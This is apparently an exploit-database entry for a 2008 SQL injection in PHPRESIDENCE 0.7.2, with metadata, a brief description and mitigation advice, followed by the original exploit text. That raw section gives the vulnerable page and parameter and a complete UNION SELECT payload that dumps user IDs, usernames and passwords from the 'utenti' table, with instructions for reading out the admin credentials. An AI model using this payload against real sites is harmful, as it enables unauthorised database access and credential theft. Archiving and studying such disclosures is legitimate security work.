PHPRESIDENCE 0.7.2 Remote Sql Injection

vendor:

PHPRESIDENCE

by:

IRCRASH (R3d.W0rm)

8.8

CVSS

HIGH

SQL Injection

CWE

Product Name: PHPRESIDENCE

Affected Version From: PHPRESIDENCE 0.7.2

Affected Version To: PHPRESIDENCE 0.7.2

Patch Exists: NO

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2008

PHPRESIDENCE 0.7.2 Remote Sql Injection

A vulnerability exists in PHPRESIDENCE 0.7.2 which allows an attacker to inject malicious SQL queries via the 'id_sessione' parameter in the 'visualizza_tabelle.php' script. By sending a specially crafted request, an attacker can execute arbitrary SQL commands on the underlying database server.

Mitigation:

Input validation should be used to prevent SQL injection attacks. All user-supplied input should be validated and filtered before being used in SQL queries.

Source

Exploit-DB raw data:

#####################################################################################
####                PHPRESIDENCE 0.7.2 Remote Sql Injection                      ####
####                              BY IRCRASH                                     ####
#####################################################################################
#                                                                                   #
#AUTHOR : IRCRASH (R3d.W0rm)                                                        #
#                                                                                   #
#Script Download : http://www.digitaldruid.net/download/php-residence_0.7.2.zip     #
#                                                                                   #
#Vulnerability Page: http://site.com/path/visualizza_tabelle.php?id_sessione=&anno=2006&tipo_tabella=clienti
#                                                                                   #
#Search query : 99999'union/**/select/**/idutenti,nome_utente,password,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null/**/from/**/utenti/*
#                                                                                   #
#Help : Go Vulnerability Page and Type Search Query in the textbox . Now you can    #
#        see Admin Username And Password                                            #
#                                                                                   #
#                        Our site : HTTP://IRCRASH.COM                              #
#                                                                                   #
#####################################################################################

# milw0rm.com [2008-01-16]